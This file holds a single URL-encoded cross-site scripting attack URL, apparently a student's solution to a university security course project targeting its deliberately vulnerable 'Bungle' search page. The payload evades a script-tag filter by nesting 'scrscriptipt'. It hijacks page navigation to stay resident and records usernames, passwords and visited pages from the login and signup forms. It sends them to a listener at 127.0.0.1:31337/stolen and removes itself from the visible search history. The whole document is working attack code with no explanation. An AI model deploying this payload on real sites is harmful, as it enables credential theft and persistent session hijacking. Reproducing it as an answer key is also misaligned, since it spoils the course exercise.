xss_2.txt
http://eecs388.org/project2/search?xssdefense=2&q=%3Cscrscriptipt%3Efunction%20payload(attacker)%7B%0Afunction%20log(data)%7B%0Aconsole.log(%24.param(data))%3B%0A%24.get(attacker%2B%22stolen%22%2Cdata)%3B%0A%7D%0Afunction%20proxy(href%2CqVal%2ChVal)%7B%0A%24(%22html%22).load(href%2Cfunction()%7B%0Avar%20logO%3D%7Bevent%3A%20%22nav%22%7D%3B%0Avar%20logUser%3D%20%24(%22%23logged-in-user%22).text()%3B%0Aif(logUser)logO%5B%22user%22%5D%3DlogUser%3B%0AlogO%5B%22url%22%5D%3Dhref%3B%0Alog(logO)%3B%0A%24(%22html%22).append(%22%3Cscrscriptipt%22%2B%22%3E%22%2Bpayload.toString()%2B%22%3B%3C%2Fscrscriptipt%22%2B%22%3E%22)%3B%0A%24(%22.history-item%22).each(function(elm)%7B%0Aif(%24(this).text().indexOf(%22function%20payload(%22)%3E%3D%200)%7B%0A%24(this).remove()%3B%0A%7D%0A%7D)%0A%24(%22%23query%22).val(qVal)%3B%0A%24(%22%23history-list%22).html(hVal)%3B%0A%24(%22%23bungle-lnk%22).on(%22click%22%2Cfunction(event)%7B%0Aevent.preventDefault()%3B%0Avar%20g%3D%22%2Fproject2%2F%22%3B%0Aif(location.pathname!%3Dg)%7B%0Ahistory.pushState(%7B%7D%2C%22%22%2Cg)%3B%0Aproxy(g)%3B%0A%7D%0A%7D)%3B%0A%24(%22%23search-again-btn%22).on(%22click%22%2Cfunction(event)%7B%0Aevent.preventDefault()%3B%0Avar%20g%3D%22.%2F%22%3B%0Ahistory.pushState(%7B%7D%2C%22%22%2C%20g)%3B%0Aproxy(g)%3B%0A%7D)%3B%0A%24(%22%23log-in-btn%22).on(%22click%22%2Cfunction(event)%7B%0Aevent.preventDefault()%3B%0Avar%20user%3D%24(%22input%23username%22).val()%3B%0Avar%20pass%3D%24(%22%23userpass%22).val()%3B%0A%24.ajax(%7B%0Atype%3A%22POST%22%2C%0Aurl%3A%22.%2Flogin%22%2C%0Adata%3A%7Busername%3Auser%2Cpassword%3Apass%7D%0A%7D)%0A.done(function()%7B%0Alog(%7Bevent%3A%22login%22%2Cuser%3Auser%2Cpass%3Apass%7D)%3B%0Aproxy(%22.%2F%22)%3B%0A%7D)%3B%0A%7D)%3B%0A%24(%22%23log-out-btn%22).on(%22click%22%2Cfunction(event)%7B%0Aevent.preventDefault()%3B%0A%24.ajax(%7B%0Atype%3A%22POST%22%2C%0Aurl%3A%22.%2Flogout%22%0A%7D)%0A.done(function()%7B%0Alog(%7Bevent%3A%22logout%22%2Cuser%3AlogUser%7D)%3B%0Avar%20g%3D%22%2Fproject2%2F%22%3B%0A
if(location.pathname!%3D%20g)%7B%0Ahistory.pushState(%7B%7D%2C%22%22%2C%20g)%3B%0A%7D%0Aproxy(g)%3B%0A%7D)%3B%0A%7D)%3B%0A%24(%22%23new-account-btn%22).on(%22click%22%2Cfunction(event)%7B%0Aevent.preventDefault()%3B%0Avar%20user%3D%24(%22input%23username%22).val()%3B%0Avar%20pass%3D%24(%22%23userpass%22).val()%3B%0A%24.ajax(%7B%0Atype%3A%22POST%22%2C%0Aurl%3A%22.%2Fcreate%22%2C%0Adata%3A%7Busername%3Auser%2Cpassword%3Apass%7D%0A%7D)%0A.done(function()%7B%0Alog(%7Bevent%3A%22login%22%2Cuser%3Auser%2Cpass%3Apass%7D)%3B%0Aproxy(%22.%2F%22)%3B%0A%7D)%3B%0A%7D)%3B%0A%24(%22%23search-btn%22).on(%22click%22%2Cfunction(event)%7B%0Aevent.preventDefault()%3B%0Avar%20obj%3Dhistory.state%3B%0Aobj%5B%22query%22%5D%3D%24(%22%23query%22).val()%3B%0Ahistory.replaceState(obj%2C%22%22%2Clocation.pathname)%3B%0Avar%20g%3D%22.%2Fsearch%3Fq%3D%22%2BencodeURIComponent(%24(%22%23query%22).val()).replace(%2F%2520%2Fg%2C%22%2B%22)%3B%0Ahistory.pushState(obj%2C%22%22%2Cg)%3B%0Aproxy(g)%3B%0A%7D)%3B%0A%24(%22.history-item.list-group-item%22).on(%22click%22%2Cfunction(event)%7B%0Aevent.preventDefault()%3B%0Avar%20obj%3Dhistory.state%3B%0Aobj%5B%22hVal%22%5D%3D%24(%22%23history-list%22).html()%3B%0Ahistory.replaceState(obj%2C%22%22%2Clocation.pathname%2Blocation.search)%3B%0Avar%20g%3D%22.%2Fsearch%3Fq%3D%22%2BencodeURIComponent(%24(this).text()).replace(%2F%2520%2Fg%2C%22%2B%22)%3B%0Ahistory.pushState(%7B%7D%2C%22%22%2Cg)%3B%0Aproxy(g)%3B%0A%7D)%3B%0A%24(%22html%22).show()%3B%0A%7D)%3B%0A%7D%0A%24(%22html%22).hide()%3B%0Aproxy(%22.%2F%22)%3B%0Ahistory.replaceState(%7B%7D%2C%22%22%2C%22%2Fproject2%2F%22)%3B%0A%24(window).on(%22popstate%22%2C%20function(event)%7B%0Aif(event.originalEvent.state!%3Dnull)%7B%0Aproxy(location.href%2Cevent.originalEvent.state%5B%22query%22%5D%2Cevent.originalEvent.state%5B%22hVal%22%5D)%3B%0A%7D%0A%7D)%3B%0A%7D%3Bpayload(%22http%3A%2F%2F127.0.0.1%3A31337%2F%22)%3B%3C%2Fscrscriptipt%3E